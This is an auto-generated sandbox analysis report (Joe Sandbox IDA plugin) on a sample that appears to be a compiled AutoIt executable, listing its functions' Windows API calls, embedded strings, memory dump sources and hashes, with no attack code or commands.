                                                                        • Opcode ID: 8a74e92418faf1bea08d88dfb9f65d48b0147cd4b502ccedffcabd07a7bc1b32
                                                                        • Instruction ID: 838349a99460e8f24f9cd0b3ba901d16b709259c3849d8e722e00416f3d63730
                                                                        • Opcode Fuzzy Hash: 8a74e92418faf1bea08d88dfb9f65d48b0147cd4b502ccedffcabd07a7bc1b32
                                                                        • Instruction Fuzzy Hash: 39B19871601229EBDF14CF68C9957ED7BB5BF08701F088069EC489B299D734AA90CBA0
                                                                        Function 009083BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00899837: __itow.LIBCMT ref: 00899862
                                                                        • CoInitialize.OLE32 ref: 00908403
                                                                        • CoUninitialize.OLE32 ref: 0090840E
                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00922BEC,?), ref: 0090846E
                                                                        • IIDFromString.OLE32(?,?), ref: 009084E1
                                                                        • VariantInit.OLEAUT32(?), ref: 0090857B
                                                                        • VariantClear.OLEAUT32(?), ref: 009085DC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow
                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                        • API String ID: 2670013897-1287834457
                                                                        • Opcode ID: bde01a480a1e42ab8c5a87961e7db080a54ff4b36fbe6daecc16195b56d5482b
                                                                        • Instruction ID: 0812a54908b0807baf337fa6790d058a5c997541485dbbc7777f515a25e8fbce
                                                                        • Opcode Fuzzy Hash: bde01a480a1e42ab8c5a87961e7db080a54ff4b36fbe6daecc16195b56d5482b
                                                                        • Instruction Fuzzy Hash: 3C619A70708712AFC710DF28C849B6BB7E8AF49754F04485DF9869B2A1DB74ED48CB92
                                                                        Function 00905732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00905793
                                                                        • inet_addr.WSOCK32(?,?,?), ref: 009057D8
                                                                        • gethostbyname.WSOCK32(?), ref: 009057E4
                                                                        • IcmpCreateFile.IPHLPAPI ref: 009057F2
                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00905862
                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00905878
                                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 009058ED
                                                                        • WSACleanup.WSOCK32 ref: 009058F3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                        • String ID: Ping
                                                                        • API String ID: 1028309954-2246546115
                                                                        • Opcode ID: 014706b198928706d8c167f35630ba817e05d845c3e7f3bea6b2c793988c2ad3
                                                                        • Instruction ID: 07ade4059715845d5b94ad6516aaada06ee48e2004aaf08ae89c33939a642cba
                                                                        • Opcode Fuzzy Hash: 014706b198928706d8c167f35630ba817e05d845c3e7f3bea6b2c793988c2ad3
                                                                        • Instruction Fuzzy Hash: 47514C316046009FDB11EF29DC45B6A7BE8EB49720F058929FD96DB2E1DB74E800DF42
                                                                        Function 008FB4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 008FB4D0
                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 008FB546
                                                                        • GetLastError.KERNEL32 ref: 008FB550
                                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 008FB5BD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                        • API String ID: 4194297153-14809454
                                                                        • Opcode ID: 9e86dc801227684538d1cac841241a918fdd9357a29daa4659c0327d4490e585
                                                                        • Instruction ID: e66248c8d851315d0ca9b4856a7d9b22fafaa8417e5bc9a203ce09af7f9b932d
                                                                        • Opcode Fuzzy Hash: 9e86dc801227684538d1cac841241a918fdd9357a29daa4659c0327d4490e585
                                                                        • Instruction Fuzzy Hash: 07318E35A0020DAFDB00EB78C895EBEBBB4FF49318F148129E615D7291DB74DA42CB51
                                                                        Function 008E8F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
                                                                          • Part of subcall function 008EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 008EAABC
                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 008E9014
                                                                        • GetDlgCtrlID.USER32 ref: 008E901F
                                                                        • GetParent.USER32 ref: 008E903B
                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 008E903E
                                                                        • GetDlgCtrlID.USER32(?), ref: 008E9047
                                                                        • GetParent.USER32(?), ref: 008E9063
                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 008E9066
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 1536045017-1403004172
                                                                        • Opcode ID: e82ee01f85d5c2ce82f5d28343d3884494f77dd73c28da9e4d97faad99728939
                                                                        • Instruction ID: a0d29f69b62caf0d1bdca6887fe4069e93d7e4b59217cce3f0de857d2483c455
                                                                        • Opcode Fuzzy Hash: e82ee01f85d5c2ce82f5d28343d3884494f77dd73c28da9e4d97faad99728939
                                                                        • Instruction Fuzzy Hash: 2621BD70A0020CBBDF05ABA5CC95EFEBB74FF5A310F104129F962972A1DB755819EA21
                                                                        Function 008E907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
                                                                          • Part of subcall function 008EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 008EAABC
                                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 008E90FD
                                                                        • GetDlgCtrlID.USER32 ref: 008E9108
                                                                        • GetParent.USER32 ref: 008E9124
                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 008E9127
                                                                        • GetDlgCtrlID.USER32(?), ref: 008E9130
                                                                        • GetParent.USER32(?), ref: 008E914C
                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 008E914F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 1536045017-1403004172
                                                                        • Opcode ID: c5225c5d00245e7b62cdfc3bbb66c6aadd0f29e2911e7a89f7125d07a85d5b4a
                                                                        • Instruction ID: 35577388933bf17e5f80b6415aa885ac59f6a310b65d70aa4c259934a900a29f
                                                                        • Opcode Fuzzy Hash: c5225c5d00245e7b62cdfc3bbb66c6aadd0f29e2911e7a89f7125d07a85d5b4a
                                                                        • Instruction Fuzzy Hash: 5221C174A0020CBBDF11ABA5CC85EFEBB64FF49300F004015F951D72A1DB755815DB21
                                                                        Function 008EF7A1 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 75windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,008CE2A0,00000010,?,Bad directive syntax error,0091F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 008EF7C2
                                                                        • LoadStringW.USER32(00000000,?,008CE2A0,00000010), ref: 008EF7C9
                                                                          • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
                                                                        • _wprintf.LIBCMT ref: 008EF7FC
                                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 008EF88D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: HandleLoadMessageModuleString_memmove_wprintf
                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                        • API String ID: 2652385573-4153970271
                                                                        • Opcode ID: 04aef8d4b13a62b32def7155a1d27a00bd574540a236f827739b595c11e1d931
                                                                        • Instruction ID: 9f81408be9641b15834ea4c534e4cd6c43fe9046d37b2bee96cc74d344f067a1
                                                                        • Opcode Fuzzy Hash: 04aef8d4b13a62b32def7155a1d27a00bd574540a236f827739b595c11e1d931
                                                                        • Instruction Fuzzy Hash: 05218D3291421EEBCF12FF94CC5AEEE7738FF18304F040466F515A60A2EA71A618DB52
                                                                        Function 008E9163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetParent.USER32 ref: 008E916F
                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 008E9184
                                                                        • _wcscmp.LIBCMT ref: 008E9196
                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 008E9211
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                        • API String ID: 1704125052-3381328864
                                                                        • Opcode ID: 146a2a0e9802d3d666ecb5185a75850d618bf5c80368339f3ba9df8b35abd5eb
                                                                        • Instruction ID: c8428e083332611418fae1d709811cddae289f6d5450cd2cdf085a14dc4f20ca
                                                                        • Opcode Fuzzy Hash: 146a2a0e9802d3d666ecb5185a75850d618bf5c80368339f3ba9df8b35abd5eb
                                                                        • Instruction Fuzzy Hash: DA112C3624C39FB9FE11266ADC16DE7779CFF16724B200026FA10E40D2FFE298515555
                                                                        Function 009088AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(?), ref: 009088D7
                                                                        • CoInitialize.OLE32(00000000), ref: 00908904
                                                                        • CoUninitialize.OLE32 ref: 0090890E
                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00908A0E
                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00908B3B
                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00922C0C), ref: 00908B6F
                                                                        • CoGetObject.OLE32(?,00000000,00922C0C,?), ref: 00908B92
                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00908BA5
                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00908C25
                                                                        • VariantClear.OLEAUT32(?), ref: 00908C35
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                        • String ID:
                                                                        • API String ID: 2395222682-0
                                                                        • Opcode ID: 0f029a77a6fbb2f7bc8047fc4b06b8d38691c029fe14d4e76a0f54ed20459151
                                                                        • Instruction ID: 03980336d658f85f1301fb9c0742ac3bde780bfc6d445deee96508177886c311
                                                                        • Opcode Fuzzy Hash: 0f029a77a6fbb2f7bc8047fc4b06b8d38691c029fe14d4e76a0f54ed20459151
                                                                        • Instruction Fuzzy Hash: 79C114B1608305AFD700EF68C88496BB7E9FF89358F00496DF58A9B291DB71ED05CB52
                                                                        Function 008F7990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 008F7A6C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ArraySafeVartype
                                                                        • String ID:
                                                                        • API String ID: 1725837607-0
                                                                        • Opcode ID: 55a5646d1b1980bf86d48c5aa42f24cf3de087e538005a009a9bd30ab2b2b8d9
                                                                        • Instruction ID: ee7a98dc6b461502f3b5016c385c100daf952442f15360e5e3dcc48e6af3dd45
                                                                        • Opcode Fuzzy Hash: 55a5646d1b1980bf86d48c5aa42f24cf3de087e538005a009a9bd30ab2b2b8d9
                                                                        • Instruction Fuzzy Hash: 0CB19071A0821E9FEB10DFA8D884BBEB7B4FF09325F244429E651E7291D734E941CB91
                                                                        Function 0089FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0089FAA6
                                                                        • OleUninitialize.OLE32(?,00000000), ref: 0089FB45
                                                                        • UnregisterHotKey.USER32(?), ref: 0089FC9C
                                                                        • DestroyWindow.USER32(?), ref: 008D45D6
                                                                        • FreeLibrary.KERNEL32(?), ref: 008D463B
                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 008D4668
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                        • String ID: close all
                                                                        • API String ID: 469580280-3243417748
                                                                        • Opcode ID: 484d655420bad6a32907d8dc4db5362f82b6f3d6d7c242677750e86f27750253
                                                                        • Instruction ID: 2b5de678995959871907c1cba2a62a3e52e8d96d1a13acbb5c7094353446eaa0
                                                                        • Opcode Fuzzy Hash: 484d655420bad6a32907d8dc4db5362f82b6f3d6d7c242677750e86f27750253
                                                                        • Instruction Fuzzy Hash: 04A16A30301216CFDB29EF28D994A69B760FF15714F1842ADE90AEB262DB30EC16CF51
                                                                        Function 008EA068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • EnumChildWindows.USER32(?,008EA439), ref: 008EA377
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ChildEnumWindows
                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                        • API String ID: 3555792229-1603158881
                                                                        • Opcode ID: d2f26eae726bc08697052d9068ce597f9c96d794fb21258a7ee9cb1d7a4b5a36
                                                                        • Instruction ID: cdfaab727dac4c10adfb229b0689bc90e7e79705663ab7433139807c370e2477
                                                                        • Opcode Fuzzy Hash: d2f26eae726bc08697052d9068ce597f9c96d794fb21258a7ee9cb1d7a4b5a36
                                                                        • Instruction Fuzzy Hash: DE91D63060064AAACB1CEFA5C441BEEFBB4FF06704F548519E95AE3241DF317999CB92
                                                                        Function 00892E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00892EAE
                                                                          • Part of subcall function 00891DB3: GetClientRect.USER32(?,?), ref: 00891DDC
                                                                          • Part of subcall function 00891DB3: GetWindowRect.USER32(?,?), ref: 00891E1D
                                                                          • Part of subcall function 00891DB3: ScreenToClient.USER32(?,?), ref: 00891E45
                                                                        • GetDC.USER32 ref: 008CCD32
                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 008CCD45
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 008CCD53
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 008CCD68
                                                                        • ReleaseDC.USER32(?,00000000), ref: 008CCD70
                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 008CCDFB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                        • String ID: U
                                                                        • API String ID: 4009187628-3372436214
                                                                        • Opcode ID: 1ef1ea06dbab523a0ff031743f3dd3116e3b7d3292d1ea974d40b35393d2aa04
                                                                        • Instruction ID: 734b59822d95a8b24d8c258b909126c0cdade0c30510eafc22bbdc5a99d6f7b7
                                                                        • Opcode Fuzzy Hash: 1ef1ea06dbab523a0ff031743f3dd3116e3b7d3292d1ea974d40b35393d2aa04
                                                                        • Instruction Fuzzy Hash: DA71A131504209EFCF219F64C894EEA7BB5FF49364F18426AEE5ADA266D730C881DB50
                                                                        Function 00899837 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 146COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: __i64tow__itow
                                                                        • String ID: %.15g$0x%p$False$True
                                                                        • API String ID: 1776342733-2263619337
                                                                        • Opcode ID: d6bcebfca512d0051b9aa666e53fd90a9764d9996b2ca00353793918cc874fbc
                                                                        • Instruction ID: 7f103e8f38ab645b2b51f32317275663b49e06ab2f4dbccdcf58172ae22fce4f
                                                                        • Opcode Fuzzy Hash: d6bcebfca512d0051b9aa666e53fd90a9764d9996b2ca00353793918cc874fbc
                                                                        • Instruction Fuzzy Hash: 1841A471500609AFEF24AF78D842EBA73F9FF45304F28447EE699D6392EA31D9418B11
                                                                        Function 00901A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00901A50
                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00901A7C
                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00901ABE
                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00901AD3
                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00901AE0
                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00901B10
                                                                        • InternetCloseHandle.WININET(00000000), ref: 00901B57
                                                                          • Part of subcall function 00902483: GetLastError.KERNEL32(?,?,00901817,00000000,00000000,00000001), ref: 00902498
                                                                          • Part of subcall function 00902483: SetEvent.KERNEL32(?,?,00901817,00000000,00000000,00000001), ref: 009024AD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
